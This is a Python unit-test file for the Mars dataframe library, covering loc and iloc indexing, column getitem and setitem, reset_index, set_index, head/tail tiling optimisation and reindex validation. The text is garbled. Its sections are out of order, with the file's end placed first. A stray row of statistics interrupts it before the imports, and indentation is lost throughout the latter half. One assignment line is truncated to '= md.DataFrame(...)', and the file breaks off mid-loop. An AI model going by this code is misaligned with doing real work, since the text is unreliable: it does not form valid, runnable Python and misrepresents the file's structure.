    # test fancy index which is md.Series on index axis
    df2 = df.loc[md.Series(['a3', 'a2']), [True, False, True]]
    self.assertIsInstance(df2, DataFrame)
    self.assertEqual(df2.shape, (2, 2))
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    self.assertNotEqual(df2.index_value.key, df.index_value.key)
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
                                  raw.loc[:, [True, False, True]].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)

    # test fancy index on columns axis (with column reordering)
    df2 = df.loc[[True, False, True], ['z', 'x', 'y']]
    self.assertIsInstance(df2, DataFrame)
    self.assertEqual(df2.shape, (2, 3))
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    self.assertNotEqual(df2.index_value.key, df.index_value.key)
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
                                  raw.loc[:, ['z', 'x', 'y']].columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)

    df2 = df2.tiles()
    self.assertEqual(len(df2.chunks), 2)
    for c in df2.chunks:
        self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
        pd.testing.assert_index_equal(c.index_value.to_pandas(), df.index_value.to_pandas())
        self.assertNotEqual(c.index_value.key, df.index_value.key)
        pd.testing.assert_index_equal(c.columns_value.to_pandas(),
                                      raw.loc[:, ['z', 'x', 'y']].columns)
        pd.testing.assert_series_equal(c.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)

    # boolean md.Series indexer: row count unknown until execution
    df2 = df.loc[md.Series([True, False, True])]
    self.assertIsInstance(df2, DataFrame)
    self.assertEqual(df2.shape, (np.nan, 3))
    pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
    self.assertNotEqual(df2.index_value.key, df.index_value.key)
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)

    df2 = df3.loc[md.Series([True, False, True])]
    self.assertIsInstance(df2, DataFrame)
    self.assertEqual(df2.shape, (np.nan, 3))
    self.assertIsInstance(df2.index_value.to_pandas(), type(raw.loc[[True, False, True]].index))
    self.assertNotEqual(df2.index_value.key, df3.index_value.key)
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)

    # label-valued md.Series indexer: length (and thus shape) is known
    df2 = df3.loc[md.Series([2, 1])]
    self.assertIsInstance(df2, DataFrame)
    self.assertEqual(df2.shape, (2, 3))
    self.assertIsInstance(df2.index_value.to_pandas(), type(raw2.loc[[2, 1]].index))
    self.assertNotEqual(df2.index_value.key, df3.index_value.key)
    pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
    pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)

    # Series.loc: scalar label -> 0-d tensor; label list -> Series
    series2 = series.loc['a2']
    self.assertIsInstance(series2, Tensor)
    self.assertEqual(series2.shape, ())
    self.assertEqual(series2.dtype, s.dtype)

    series2 = series.loc[['a2', 'a3']]
    self.assertIsInstance(series2, Series)
    self.assertEqual(series2.shape, (2,))
    self.assertEqual(series2.dtype, s.dtype)
    self.assertEqual(series2.name, s.name)

    # invalid indexer forms
    with self.assertRaises(IndexingError):
        _ = df.loc['a1', 'z', ...]

    with self.assertRaises(NotImplementedError):
        _ = df.loc[:, md.Series([True, False, True])]

    with self.assertRaises(KeyError):
        _ = df.loc[:, ['non_exist']]
def testLocUseIloc(self):
    """On a default RangeIndex, eligible ``loc`` calls are optimized into
    iloc ops (DataFrameIlocGetItem); anything else stays DataFrameLocGetItem."""
    raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       columns=['x', 'y', 'z'])
    df = md.DataFrame(raw, chunk_size=2)

    # positional-looking loc on RangeIndex(0, 3) -> rewritten as iloc
    self.assertIsInstance(df.loc[:3].op, DataFrameIlocGetItem)
    self.assertIsInstance(df.loc[1:3].op, DataFrameIlocGetItem)
    self.assertIsInstance(df.loc[1].op, DataFrameIlocGetItem)
    # negative bound cannot be rewritten; a missing negative label raises
    self.assertIsInstance(df.loc[:-3].op, DataFrameLocGetItem)
    with self.assertRaises(KeyError):
        _ = df.loc[-3]
    # index 1 not None
    self.assertIsInstance(df.loc[:3, :'y'].op, DataFrameLocGetItem)
    # index 1 not slice
    self.assertIsInstance(df.loc[:3, [True, False, True]].op, DataFrameLocGetItem)
    self.assertIsInstance(df.loc[[True, False, True]].op, DataFrameLocGetItem)

    # non-default RangeIndex (starts at 1): no iloc rewrite
    raw2 = raw.copy()
    raw2.index = pd.RangeIndex(1, 4)
    df2 = md.DataFrame(raw2, chunk_size=2)
    self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
    self.assertIsInstance(df2.loc['a3':].op, DataFrameLocGetItem)

    # string index: no iloc rewrite either
    raw2 = raw.copy()
    raw2.index = [f'a{i}' for i in range(3)]
    df2 = md.DataFrame(raw2, chunk_size=2)
    self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
def testDataFrameGetitem(self):
    """df[col] yields a Series; df[[cols]] yields a DataFrame; both keep the
    source index and split into the expected chunk grid when tiled."""
    data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
    df = md.DataFrame(data, chunk_size=2)

    # single column -> Series with the column's name/dtype and df's index
    series = df['c3']
    self.assertIsInstance(series, Series)
    self.assertEqual(series.shape, (10,))
    self.assertEqual(series.name, 'c3')
    self.assertEqual(series.dtype, data['c3'].dtype)
    self.assertEqual(series.index_value, df.index_value)

    series = series.tiles()
    self.assertEqual(series.nsplits, ((2, 2, 2, 2, 2),))
    self.assertEqual(len(series.chunks), 5)
    for i, c in enumerate(series.chunks):
        self.assertIsInstance(c, SERIES_CHUNK_TYPE)
        self.assertEqual(c.index, (i,))
        self.assertEqual(c.shape, (2,))

    # column list -> DataFrame; 'c1','c2' land in column chunk 0, 'c3' in 1
    df1 = df[['c1', 'c2', 'c3']]
    self.assertIsInstance(df1, DataFrame)
    self.assertEqual(df1.shape, (10, 3))
    self.assertEqual(df1.index_value, df.index_value)
    pd.testing.assert_index_equal(df1.columns_value.to_pandas(), data[['c1', 'c2', 'c3']].columns)
    pd.testing.assert_series_equal(df1.dtypes, data[['c1', 'c2', 'c3']].dtypes)

    df1 = df1.tiles()
    self.assertEqual(df1.nsplits, ((2, 2, 2, 2, 2), (2, 1)))
    self.assertEqual(len(df1.chunks), 10)
    # even positions: first column chunk (2 cols); odd positions: second (1 col)
    for i, c in enumerate(df1.chunks[slice(0, 10, 2)]):
        self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
        self.assertEqual(c.index, (i, 0))
        self.assertEqual(c.shape, (2, 2))
    for i, c in enumerate(df1.chunks[slice(1, 10, 2)]):
        self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
        self.assertEqual(c.index, (i, 1))
        self.assertEqual(c.shape, (2, 1))
def testDataFrameGetitemBool(self):
    """Boolean-mask getitem: a fresh index_value per distinct mask, while the
    columns_value object is shared with the source frame."""
    data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
    df = md.DataFrame(data, chunk_size=2)

    mask_data1 = data.c1 > 0.5
    mask_data2 = data.c1 < 0.5
    mask1 = md.Series(mask_data1, chunk_size=2)
    mask2 = md.Series(mask_data2, chunk_size=2)

    filtered1 = df[mask1]
    filtered2 = df[mask2]
    filtered3 = df[mask1]  # same mask again -> deterministic, identical keys

    # masking invalidates the index key, but columns pass through untouched
    self.assertNotEqual(filtered1.index_value.key, df.index_value.key)
    self.assertNotEqual(filtered1.index_value.key, mask1.index_value.key)
    self.assertEqual(filtered1.columns_value.key, df.columns_value.key)
    self.assertIs(filtered1.columns_value, df.columns_value)

    # different masks produce different index keys, same columns object
    self.assertNotEqual(filtered1.index_value.key, filtered2.index_value.key)
    self.assertEqual(filtered1.columns_value.key, filtered2.columns_value.key)
    self.assertIs(filtered1.columns_value, filtered2.columns_value)

    # identical masks produce identical keys (graph-level determinism)
    self.assertEqual(filtered1.index_value.key, filtered3.index_value.key)
    self.assertEqual(filtered1.columns_value.key, filtered3.columns_value.key)
    self.assertIs(filtered1.columns_value, filtered3.columns_value)
def testSeriesGetitem(self):
    """Series getitem: positional scalar, positional fancy list, and
    label-based access on a string index, checking tiled chunk metadata.

    Fix: the last two checks used ``assertTrue(x, expected)``, where the
    second argument is unittest's *msg* parameter — such an assertion passes
    for any truthy ``x`` and never compared the labels. They are now real
    ``assertEqual`` comparisons (the second expected value also had a stray
    extra list nesting, ``[['i2', 'i4']]``).
    """
    data = pd.Series(np.random.rand(10, ), name='a')
    series = md.Series(data, chunk_size=3)

    # positional scalar getitem -> 0-d tensor
    result1 = series[2]
    self.assertEqual(result1.shape, ())

    result1 = result1.tiles()
    self.assertEqual(result1.nsplits, ())
    self.assertEqual(len(result1.chunks), 1)
    self.assertIsInstance(result1.chunks[0], TENSOR_CHUNK_TYPE)
    self.assertEqual(result1.chunks[0].shape, ())
    self.assertEqual(result1.chunks[0].dtype, data.dtype)

    # positional fancy index: labels are split per output chunk
    result2 = series[[4, 5, 1, 2, 3]]
    self.assertEqual(result2.shape, (5,))

    result2 = result2.tiles()
    self.assertEqual(result2.nsplits, ((2, 2, 1),))
    self.assertEqual(len(result2.chunks), 3)
    self.assertEqual(result2.chunks[0].op.labels, [4, 5])
    self.assertEqual(result2.chunks[1].op.labels, [1, 2])
    self.assertEqual(result2.chunks[2].op.labels, [3])

    data = pd.Series(np.random.rand(10), index=['i' + str(i) for i in range(10)])
    series = md.Series(data, chunk_size=3)

    # label-based scalar getitem
    result1 = series['i2']
    self.assertEqual(result1.shape, ())

    result1 = result1.tiles()
    self.assertEqual(result1.nsplits, ())
    self.assertEqual(result1.chunks[0].dtype, data.dtype)
    # was: assertTrue(labels, ['i2']) — always passed; now a real comparison
    self.assertEqual(result1.chunks[0].op.labels, ['i2'])

    # label-based fancy getitem
    result2 = series[['i2', 'i4']]
    self.assertEqual(result2.shape, (2,))

    result2 = result2.tiles()
    self.assertEqual(result2.nsplits, ((2,),))
    self.assertEqual(result2.chunks[0].dtype, data.dtype)
    # was: assertTrue(labels, [['i2', 'i4']]) — always passed and had an
    # extra nesting level in the expected value
    self.assertEqual(result2.chunks[0].op.labels, ['i2', 'i4'])
def testSetitem(self):
    """Adding a new column widens the frame and each tiled chunk by one."""
    data = pd.DataFrame(np.random.rand(10, 2), columns=['c1', 'c2'])
    df = md.DataFrame(data, chunk_size=4)

    df['new'] = 1
    self.assertEqual(df.shape, (10, 3))
    # the setitem op's input still carries the original 2-column dtypes
    pd.testing.assert_series_equal(df.inputs[0].dtypes, data.dtypes)

    tiled = df.tiles()
    self.assertEqual(tiled.chunks[0].shape, (4, 3))
    # NOTE(review): the three identical `tiled.inputs[0].dtypes` checks below
    # look like they were meant to inspect per-chunk dtypes — confirm intent.
    pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
    self.assertEqual(tiled.chunks[1].shape, (4, 3))
    pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
    self.assertEqual(tiled.chunks[2].shape, (2, 3))
    pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
def testResetIndex(self):
    """reset_index on DataFrame (with/without drop) and Series: the result
    gains a RangeIndex whose per-chunk ranges line up with chunk positions."""
    data = pd.DataFrame([('bird', 389.0),
                         ('bird', 24.0),
                         ('mammal', 80.5),
                         ('mammal', np.nan)],
                        index=['falcon', 'parrot', 'lion', 'monkey'],
                        columns=('class', 'max_speed'))
    # default reset_index: old index becomes a column -> 3 columns
    df = md.DataFrame(data, chunk_size=2).reset_index()
    r = data.reset_index()
    self.assertEqual(df.shape, (4, 3))
    pd.testing.assert_series_equal(df.dtypes, r.dtypes)
    pd.testing.assert_index_equal(df.columns_value.to_pandas(), r.columns)

    df2 = df.tiles()
    self.assertEqual(len(df2.chunks), 2)
    self.assertEqual(df2.chunks[0].shape, (2, 3))
    # each chunk carries its slice of the new RangeIndex
    pd.testing.assert_index_equal(df2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
    pd.testing.assert_series_equal(df2.chunks[0].dtypes, r.dtypes)
    self.assertEqual(df2.chunks[1].shape, (2, 3))
    pd.testing.assert_index_equal(df2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
    pd.testing.assert_series_equal(df2.chunks[1].dtypes, r.dtypes)

    # drop=True: old index discarded -> 2 columns; chunk_size=1 -> 8 chunks
    df = md.DataFrame(data, chunk_size=1).reset_index(drop=True)
    r = data.reset_index(drop=True)
    self.assertEqual(df.shape, (4, 2))
    pd.testing.assert_series_equal(df.dtypes, r.dtypes)

    df2 = df.tiles()
    self.assertEqual(len(df2.chunks), 8)
    for c in df2.chunks:
        self.assertEqual(c.shape, (1, 1))
        pd.testing.assert_index_equal(c.index_value.to_pandas(), pd.RangeIndex(c.index[0], c.index[0] + 1))
        pd.testing.assert_series_equal(c.dtypes, r.dtypes[c.index[1]: c.index[1] + 1])

    # test Series: reset_index turns it into a 2-column frame (idx + values)
    series_data = pd.Series([1, 2, 3, 4], name='foo',
                            index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
    s = md.Series(series_data, chunk_size=2).reset_index()
    r = series_data.reset_index()
    self.assertEqual(s.shape, (4, 2))
    pd.testing.assert_series_equal(s.dtypes, r.dtypes)

    s2 = s.tiles()
    self.assertEqual(len(s2.chunks), 2)
    self.assertEqual(s2.chunks[0].shape, (2, 2))
    pd.testing.assert_index_equal(s2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
    self.assertEqual(s2.chunks[1].shape, (2, 2))
    pd.testing.assert_index_equal(s2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))

    # inplace=True on Series.reset_index is not allowed (type would change)
    with self.assertRaises(TypeError):
        md.Series(series_data, chunk_size=2).reset_index(inplace=True)
def testHeadTailOptimize(self):
    """Negative cases for the head/tail tiling optimization: each call below
    must NOT qualify for the optimized head/tail tile path."""
    raw = pd.DataFrame(np.random.rand(4, 3))
    df = md.DataFrame(raw, chunk_size=2)

    # no nan chunk shape (all chunk sizes are known)
    self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df.tiles().head(2).op))

    df2 = df[df[0] < 0.5].tiles()
    # chunk shape on axis 1 greater than 1
    self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.head(2).op))

    df = md.DataFrame(raw, chunk_size=(2, 3))
    df2 = df[df[0] < 0.5].tiles()
    # not slice
    self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[2].op))
    # step not None
    self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:2:2].op))
    # not head or tail
    self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[1:3].op))
    # slice 1 is not slice(None)
    self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:3, :2].op))
def testReindex(self):
    """reindex argument validation: unknown kwargs and tensor fill_value raise."""
    raw = pd.DataFrame(np.random.rand(4, 3))
    mdf = md.DataFrame(raw, chunk_size=2)

    # unexpected keyword arguments are rejected
    with self.assertRaises(TypeError):
        mdf.reindex(unknown_arg=1)

    # fill_value must be a scalar, not a tensor
    with self.assertRaises(ValueError):
        mdf.reindex([1, 2], fill_value=mt.tensor([1, 2]))
| 47.03629 | 111 | 0.624861 |
import numpy as np
import pandas as pd
import mars.dataframe as md
import mars.tensor as mt
from mars.tensor.core import TENSOR_CHUNK_TYPE, Tensor
from mars.tests.core import TestBase
from mars.dataframe.core import SERIES_CHUNK_TYPE, Series, DataFrame, DATAFRAME_CHUNK_TYPE
from mars.dataframe.indexing.iloc import DataFrameIlocGetItem, DataFrameIlocSetItem, \
IndexingError, HeadTailOptimizedOperandMixin
from mars.dataframe.indexing.loc import DataFrameLocGetItem
class Test(TestBase):
def testSetIndex(self):
    """set_index('y') with drop=True/False: the 'y' column is removed from or
    kept in the column chunks accordingly."""
    df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
                       index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
    df2 = md.DataFrame(df1, chunk_size=2)

    # drop=True: column chunks end up as ['x'] and ['z']
    df3 = df2.set_index('y', drop=True)
    df3 = df3.tiles()
    self.assertEqual(df3.chunk_shape, (2, 2))
    pd.testing.assert_index_equal(df3.chunks[0].columns_value.to_pandas(), pd.Index(['x']))
    pd.testing.assert_index_equal(df3.chunks[1].columns_value.to_pandas(), pd.Index(['z']))

    # drop=False: 'y' stays in the first column chunk
    df4 = df2.set_index('y', drop=False)
    df4 = df4.tiles()
    self.assertEqual(df4.chunk_shape, (2, 2))
    pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), pd.Index(['x', 'y']))
    pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
def testILocGetItem(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
with self.assertRaises(IndexingError):
_ = df2.iloc[1, 1, 1]
with self.assertRaises(IndexingError):
_ = df2.iloc[(1,), ]
with self.assertRaises(TypeError):
_ = df2.iloc['a1':]
with self.assertRaises(NotImplementedError):
_ = df2.iloc[0, md.Series(['a2', 'a3'])]
with self.assertRaises(ValueError):
_ = df2.iloc[[[0, 1], [1, 2]]]
with self.assertRaises(ValueError):
_ = df2.iloc[1, ...]
with self.assertRaises(IndexError):
_ = df2.iloc[-4]
with self.assertRaises(IndexError):
_ = df2.iloc[3]
df3 = df2.iloc[1]
df3 = df3.tiles()
self.assertIsInstance(df3, Series)
self.assertIsInstance(df3.op, DataFrameIlocGetItem)
self.assertEqual(df3.shape, (3,))
self.assertEqual(df3.chunk_shape, (2,))
self.assertEqual(df3.chunks[0].shape, (2,))
self.assertEqual(df3.chunks[1].shape, (1,))
self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df3.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df3.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df3.chunks[1].inputs[0].shape, (2, 1))
df4 = df2.iloc[:, 2:4]
df4 = df4.tiles()
self.assertIsInstance(df4, DataFrame)
self.assertIsInstance(df4.op, DataFrameIlocGetItem)
self.assertEqual(df4.shape, (3, 1))
self.assertEqual(df4.chunk_shape, (2, 1))
self.assertEqual(df4.chunks[0].shape, (2, 1))
pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[0].dtypes, df1.dtypes[2:3])
self.assertIsInstance(df4.chunks[0].index_value.to_pandas(), type(df1.index))
self.assertEqual(df4.chunks[1].shape, (1, 1))
pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[1].dtypes, df1.dtypes[2:3])
self.assertNotEqual(df4.chunks[0].index_value.key, df4.chunks[1].index_value.key)
self.assertIsInstance(df4.chunks[1].index_value.to_pandas(), type(df1.index))
self.assertEqual(df4.chunks[0].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[0].inputs[0].index, (0, 1))
self.assertEqual(df4.chunks[0].inputs[0].shape, (2, 1))
self.assertEqual(df4.chunks[1].inputs[0].index, (1, 1))
self.assertEqual(df4.chunks[1].inputs[0].shape, (1, 1))
df5 = df2.iloc[[0], [0, 1, 2]]
df5 = df5.tiles()
self.assertIsInstance(df5, DataFrame)
self.assertIsInstance(df5.op, DataFrameIlocGetItem)
self.assertEqual(df5.shape, (1, 3))
self.assertEqual(df5.chunk_shape, (1, 2))
self.assertEqual(df5.chunks[0].shape, (1, 2))
pd.testing.assert_index_equal(df5.chunks[0].columns_value.to_pandas(), df1.columns[:2])
pd.testing.assert_series_equal(df5.chunks[0].dtypes, df1.dtypes[:2])
self.assertIsInstance(df5.chunks[0].index_value.to_pandas(), type(df1.index))
self.assertEqual(df5.chunks[1].shape, (1, 1))
pd.testing.assert_index_equal(df5.chunks[1].columns_value.to_pandas(), df1.columns[2:])
pd.testing.assert_series_equal(df5.chunks[1].dtypes, df1.dtypes[2:])
self.assertIsInstance(df5.chunks[1].index_value.to_pandas(), type(df1.index))
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
self.assertEqual(df5.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df5.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df5.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df5.chunks[1].inputs[0].shape, (2, 1))
df6 = df2.iloc[[1, 2], [0, 1, 2]]
df6 = df6.tiles()
self.assertIsInstance(df6, DataFrame)
self.assertIsInstance(df6.op, DataFrameIlocGetItem)
self.assertEqual(df6.shape, (2, 3))
self.assertEqual(df6.chunk_shape, (2, 2))
self.assertEqual(df6.chunks[0].shape, (1, 2))
self.assertEqual(df6.chunks[1].shape, (1, 1))
self.assertEqual(df6.chunks[2].shape, (1, 2))
self.assertEqual(df6.chunks[3].shape, (1, 1))
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
self.assertEqual(df6.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df6.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df6.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df6.chunks[1].inputs[0].shape, (2, 1))
self.assertEqual(df6.chunks[2].inputs[0].index, (1, 0))
self.assertEqual(df6.chunks[2].inputs[0].shape, (1, 2))
self.assertEqual(df6.chunks[3].inputs[0].index, (1, 1))
self.assertEqual(df6.chunks[3].inputs[0].shape, (1, 1))
df7 = df2.iloc[1, 2]
df7 = df7.tiles()
self.assertIsInstance(df7, Tensor)
self.assertIsInstance(df7.op, DataFrameIlocGetItem)
self.assertEqual(df7.shape, ())
self.assertEqual(df7.chunk_shape, ())
self.assertEqual(df7.chunks[0].dtype, df7.dtype)
self.assertEqual(df7.chunks[0].shape, ())
self.assertEqual(df7.chunks[0].op.indexes, (1, 0))
self.assertEqual(df7.chunks[0].inputs[0].index, (0, 1))
self.assertEqual(df7.chunks[0].inputs[0].shape, (2, 1))
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[4:8]
series = series.tiles()
self.assertEqual(series.shape, (4,))
self.assertEqual(len(series.chunks), 2)
self.assertEqual(series.chunks[0].shape, (2,))
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes, (slice(1, 3, 1),))
self.assertEqual(series.chunks[1].shape, (2,))
self.assertEqual(series.chunks[1].op.indexes, (slice(0, 2, 1),))
self.assertEqual(series.chunks[1].index, (1,))
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[[2, 4, 8]]
series = series.tiles()
self.assertEqual(series.shape, (3,))
self.assertEqual(len(series.chunks), 3)
self.assertEqual(series.chunks[0].shape, (1,))
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes[0], [2])
self.assertEqual(series.chunks[1].shape, (1,))
self.assertEqual(series.chunks[1].op.indexes[0], [1])
self.assertEqual(series.chunks[1].index, (1,))
self.assertEqual(series.chunks[2].shape, (1,))
self.assertEqual(series.chunks[2].op.indexes[0], [2])
self.assertEqual(series.chunks[2].index, (2,))
def testILocSetItem(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
df2 = df2.tiles()
df3 = md.DataFrame(df1, chunk_size=2)
df3.iloc[1] = 100
df3 = df3.tiles()
self.assertIsInstance(df3.op, DataFrameIlocSetItem)
self.assertEqual(df3.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df3.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df3.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df3.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))
= md.DataFrame(df1, chunk_size=2)
df4.iloc[:, 2:4] = 1111
df4 = df4.tiles()
self.assertIsInstance(df4.op, DataFrameIlocSetItem)
self.assertEqual(df4.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df4.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df4.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df4.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[3].op.indexes, (slice(None, None, None), slice(None, None, None)))
df5 = md.DataFrame(df1, chunk_size=2)
df5.iloc[[0], [0, 1, 2]] = 2222
df5 = df5.tiles()
self.assertIsInstance(df5.op, DataFrameIlocSetItem)
self.assertEqual(df5.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df5.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df5.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df5.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
df6 = md.DataFrame(df1, chunk_size=2)
df6.iloc[[1, 2], [0, 1, 2]] = 3333
df6 = df6.tiles()
self.assertIsInstance(df6.op, DataFrameIlocSetItem)
self.assertEqual(df6.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df6.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df6.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df6.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
df7 = md.DataFrame(df1, chunk_size=2)
df7.iloc[1, 2] = 4444
df7 = df7.tiles()
self.assertIsInstance(df7.op, DataFrameIlocSetItem)
self.assertEqual(df7.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df7.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df7.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df7.chunks):
self.assertEqual(c1.shape, c2.shape)
